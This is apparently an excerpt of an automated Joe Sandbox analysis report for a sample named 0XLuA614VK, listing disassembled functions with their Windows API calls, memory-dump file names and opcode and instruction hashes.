                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 1120388591-0
                                                      • Opcode ID: 1ff54e2aac966a1acf34b7b538fa72fc0fced8a7d0df1b09887a0445b2b7d82d
                                                      • Instruction ID: 2bb48b1f284a403540cea2757a2f2fb31ffe76a321fdf42389f9c8e162b9aec0
                                                      • Opcode Fuzzy Hash: 1ff54e2aac966a1acf34b7b538fa72fc0fced8a7d0df1b09887a0445b2b7d82d
                                                      • Instruction Fuzzy Hash: 2781C071608241EFC714DF24C885E2ABBE5FF85318F14896CF4598B2A2CB31ED45EB92
                                                      Function 00F7F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000035), ref: 00F7F7B9
                                                      • SysAllocString.OLEAUT32(00000001), ref: 00F7F860
                                                      • VariantCopy.OLEAUT32(00F7FA64,00000000), ref: 00F7F889
                                                      • VariantClear.OLEAUT32(00F7FA64), ref: 00F7F8AD
                                                      • VariantCopy.OLEAUT32(00F7FA64,00000000), ref: 00F7F8B1
                                                      • VariantClear.OLEAUT32(?), ref: 00F7F8BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                      • String ID:
                                                      • API String ID: 3859894641-0
                                                      • Opcode ID: 179accac84530a4a02d3f17dc9ffff6dcb4934998cfc3d221efd427ac2a352ff
                                                      • Instruction ID: bfda1790a44cc3293150699ee8232dfbccb720338e25014a521568a596e1c3ac
                                                      • Opcode Fuzzy Hash: 179accac84530a4a02d3f17dc9ffff6dcb4934998cfc3d221efd427ac2a352ff
                                                      • Instruction Fuzzy Hash: C151B531900310BADF20AB65DC95B69B3A4EF45320F24D467E909EF291DB748C48EBA7
                                                      Function 00F9910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F27620: _wcslen.LIBCMT ref: 00F27625
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00F994E5
                                                      • _wcslen.LIBCMT ref: 00F99506
                                                      • _wcslen.LIBCMT ref: 00F9952D
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00F99585
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName$OpenSave
                                                      • String ID: X
                                                      • API String ID: 83654149-3081909835
                                                      • Opcode ID: e9566647041af99700f759f6736ba16c5f829f36d1ca010c1d29c9fb37cf4258
                                                      • Instruction ID: de44016734966bcd7019cbf4569edb6271a5a48980594ec68dbfbdf2e55bf6cf
                                                      • Opcode Fuzzy Hash: e9566647041af99700f759f6736ba16c5f829f36d1ca010c1d29c9fb37cf4258
                                                      • Instruction Fuzzy Hash: 05E1C4319083509FDB24DF28D881F6AB7E4BF84310F05896DF8899B2A2DB75DD05DB92
                                                      Function 00F3920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • BeginPaint.USER32(?,?,?), ref: 00F39241
                                                      • GetWindowRect.USER32(?,?), ref: 00F392A5
                                                      • ScreenToClient.USER32(?,?), ref: 00F392C2
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F392D3
                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00F39321
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F771EA
                                                        • Part of subcall function 00F39339: BeginPath.GDI32(00000000), ref: 00F39357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                      • String ID:
                                                      • API String ID: 3050599898-0
                                                      • Opcode ID: 077443772db0868c157b770f01fe2046b82060a4c13ff61ed35a3fd854899c93
                                                      • Instruction ID: 30d485ad3e3d399ab8d380c084d198f020e2e1d89d74b59e903049c9d9dcc392
                                                      • Opcode Fuzzy Hash: 077443772db0868c157b770f01fe2046b82060a4c13ff61ed35a3fd854899c93
                                                      • Instruction Fuzzy Hash: CF41AC71508304AFD721EF24CC84FBB7BA8EF45370F140269F999972A1C7B19845EBA2
                                                      Function 00F907EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F9080C
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F90847
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00F90863
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00F908DC
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F908F3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F90921
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3368777196-0
                                                      • Opcode ID: 5ceb1d398eeb4d26b8f2cf3cfe74cc5d7d60cf1b529f383bfb44e2bf4c09b150
                                                      • Instruction ID: c469cdab8d6a5bce70f73ac7ecffd82dc3df58ea0a56f421e6e8bd1d1894b432
                                                      • Opcode Fuzzy Hash: 5ceb1d398eeb4d26b8f2cf3cfe74cc5d7d60cf1b529f383bfb44e2bf4c09b150
                                                      • Instruction Fuzzy Hash: E0415B71A00209EFEF14AF54DC85A6A7778FF04310F1440A9ED04AA297DB34DE65EBA4
                                                      Function 00FB81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F7F3AB,00000000,?,?,00000000,?,00F7682C,00000004,00000000,00000000), ref: 00FB824C
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00FB8272
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FB82D1
                                                      • ShowWindow.USER32(00000000,00000004), ref: 00FB82E5
                                                      • EnableWindow.USER32(00000000,00000001), ref: 00FB830B
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FB832F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: b03eb49c84a36789e9843e10c2cfdba92f6abd6bca2205950d2625e711be607a
                                                      • Instruction ID: f64bf47c4b49cca14ab4a2a9bc436137c65cdc659b2bca2cc54f86542b20de7c
                                                      • Opcode Fuzzy Hash: b03eb49c84a36789e9843e10c2cfdba92f6abd6bca2205950d2625e711be607a
                                                      • Instruction Fuzzy Hash: EA419734A01644EFDB21DF16CC95BE47BE9BF86764F1842A5E5084F262CB719C42EF90
                                                      Function 00F84C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00F84C95
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F84CB2
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F84CEA
                                                      • _wcslen.LIBCMT ref: 00F84D08
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F84D10
                                                      • _wcsstr.LIBVCRUNTIME ref: 00F84D1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                      • String ID:
                                                      • API String ID: 72514467-0
                                                      • Opcode ID: f5ec61ba0dffddd3f8da9fce96c47a5b174eaf2a93af964a9b6048b8c5e83d5a
                                                      • Instruction ID: 0c842af7963247338532ab7891b57d64838dd0920e46a280cc8a309df85587d7
                                                      • Opcode Fuzzy Hash: f5ec61ba0dffddd3f8da9fce96c47a5b174eaf2a93af964a9b6048b8c5e83d5a
                                                      • Instruction Fuzzy Hash: 35210B73A04205BBEB15AB35EC49EBB7F9DDF45760F104039F809CA191EA65EC41B7A0
                                                      Function 00F9581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F23A97,?,?,00F22E7F,?,?,?,00000000), ref: 00F23AC2
                                                      • _wcslen.LIBCMT ref: 00F9587B
                                                      • CoInitialize.OLE32(00000000), ref: 00F95995
                                                      • CoCreateInstance.OLE32(00FBFCF8,00000000,00000001,00FBFB68,?), ref: 00F959AE
                                                      • CoUninitialize.OLE32 ref: 00F959CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 3172280962-24824748
                                                      • Opcode ID: 6bd9c8d70345fe5993ce943537dc97db46b7a6f2cdbdcad57ef107fad9b844f2
                                                      • Instruction ID: a222624a6df0a6037b34ab13749ee9fd19d675bba4005e32bb136ed956217a5d
                                                      • Opcode Fuzzy Hash: 6bd9c8d70345fe5993ce943537dc97db46b7a6f2cdbdcad57ef107fad9b844f2
                                                      • Instruction Fuzzy Hash: F1D17671A087119FDB15DF24C880A2ABBE1FF89B20F14885DF8899B361D735ED05DB92
                                                      Function 00F8175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F80FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F80FCA
                                                        • Part of subcall function 00F80FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F80FD6
                                                        • Part of subcall function 00F80FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F80FE5
                                                        • Part of subcall function 00F80FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F80FEC
                                                        • Part of subcall function 00F80FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F81002
                                                      • GetLengthSid.ADVAPI32(?,00000000,00F81335), ref: 00F817AE
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F817BA
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00F817C1
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F817DA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00F81335), ref: 00F817EE
                                                      • HeapFree.KERNEL32(00000000), ref: 00F817F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: 1dc679d7c14dadb5eb63eaa872c1d36e24754f2804226b61675124a80eb4453c
                                                      • Instruction ID: cca285dd7a10940d2a77a23a9ab303d3189b92f1fb4121bd417059aa17314671
                                                      • Opcode Fuzzy Hash: 1dc679d7c14dadb5eb63eaa872c1d36e24754f2804226b61675124a80eb4453c
                                                      • Instruction Fuzzy Hash: 4511AF72900209EFDB10AFA4DC89BEF7BADFB41365F10421DF441A7111C739A945EBA0
                                                      Function 00F814CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F814FF
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F81506
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F81515
                                                      • CloseHandle.KERNEL32(00000004), ref: 00F81520
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F8154F
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F81563
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: fcaffc4de2c3e7e3836d4a1936d208b83b958a47c82f3e3b226b1d36c610320d
                                                      • Instruction ID: b34026378c052a026b29c86fdc394468557b8037626685062501919bd791d3a6
                                                      • Opcode Fuzzy Hash: fcaffc4de2c3e7e3836d4a1936d208b83b958a47c82f3e3b226b1d36c610320d
                                                      • Instruction Fuzzy Hash: 7111477250420DABDF11DF98DD49BDB7BADFB48754F084224FA05A2060C3718E61ABA0
                                                      Function 00F43382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00F43379,00F42FE5), ref: 00F43390
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F4339E
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F433B7
                                                      • SetLastError.KERNEL32(00000000,?,00F43379,00F42FE5), ref: 00F43409
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 3edcb6c567a96d713a45aeffaa0325e96ae60825f39b849ff65c21fd624e2e7f
                                                      • Instruction ID: aaf0a2caba6532bc36b7cf37b1cc23ac8b79b30e84b7cffe5379555de0db6444
                                                      • Opcode Fuzzy Hash: 3edcb6c567a96d713a45aeffaa0325e96ae60825f39b849ff65c21fd624e2e7f
                                                      • Instruction Fuzzy Hash: 9F01F733A09326BFA6292B747CC5A673E94EB457797200329FE20C52F1EF114E0279C4
                                                      Function 00F52D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00F55686,00F63CD6,?,00000000,?,00F55B6A,?,?,?,?,?,00F4E6D1,?,00FE8A48), ref: 00F52D78
                                                      • _free.LIBCMT ref: 00F52DAB
                                                      • _free.LIBCMT ref: 00F52DD3
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00F4E6D1,?,00FE8A48,00000010,00F24F4A,?,?,00000000,00F63CD6), ref: 00F52DE0
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00F4E6D1,?,00FE8A48,00000010,00F24F4A,?,?,00000000,00F63CD6), ref: 00F52DEC
                                                      • _abort.LIBCMT ref: 00F52DF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: a6635f90d72576d9dfea81cdab98a27609c49560f74be3e79262a3ee4d2d3b25
                                                      • Instruction ID: 1f016c3a7385f815efa433fb66d8d8431a312ed0a8f56f33a42762981feb6aa0
                                                      • Opcode Fuzzy Hash: a6635f90d72576d9dfea81cdab98a27609c49560f74be3e79262a3ee4d2d3b25
                                                      • Instruction Fuzzy Hash: 6CF0CD3290590427C29227397C46E5F36756FC37B3F244719FF24921D2DF28880E7560
                                                      Function 00FB8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F39693
                                                        • Part of subcall function 00F39639: SelectObject.GDI32(?,00000000), ref: 00F396A2
                                                        • Part of subcall function 00F39639: BeginPath.GDI32(?), ref: 00F396B9
                                                        • Part of subcall function 00F39639: SelectObject.GDI32(?,00000000), ref: 00F396E2
                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00FB8A4E
                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00FB8A62
                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00FB8A70
                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00FB8A80
                                                      • EndPath.GDI32(?), ref: 00FB8A90
                                                      • StrokePath.GDI32(?), ref: 00FB8AA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: f045eb7f2146fb38344c93500b9015550b1783724162fe46a3155db9d20eddd5
                                                      • Instruction ID: 6940ea5988f342b8d1ee2d75fdd7d69fb39f299175f99bfe0f28216831ed1a70
                                                      • Opcode Fuzzy Hash: f045eb7f2146fb38344c93500b9015550b1783724162fe46a3155db9d20eddd5
                                                      • Instruction Fuzzy Hash: 8911097640010DFFDB129F94DC88EAA7F6CEF083A0F008112BA199A1A1C7719D55EFA0
                                                      Function 00F851FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00F85218
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F85229
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F85230
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00F85238
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F8524F
                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F85261
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 848793028645283d9f05f96e222399949f982cd067dbd2490943e59289f0c925
                                                      • Instruction ID: 3ef820420efea580d0de23097c9cc61c2c26a2e886b196ad5d0a27db03d2bca4
                                                      • Opcode Fuzzy Hash: 848793028645283d9f05f96e222399949f982cd067dbd2490943e59289f0c925
                                                      • Instruction Fuzzy Hash: 3C016775E00718BBEB106BA99C49E5FBFB9EF44751F044165FA05E7281DA709C00DFA0
                                                      Function 00F21BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F21BF4
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F21BFC
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F21C07
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F21C12
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F21C1A
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F21C22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
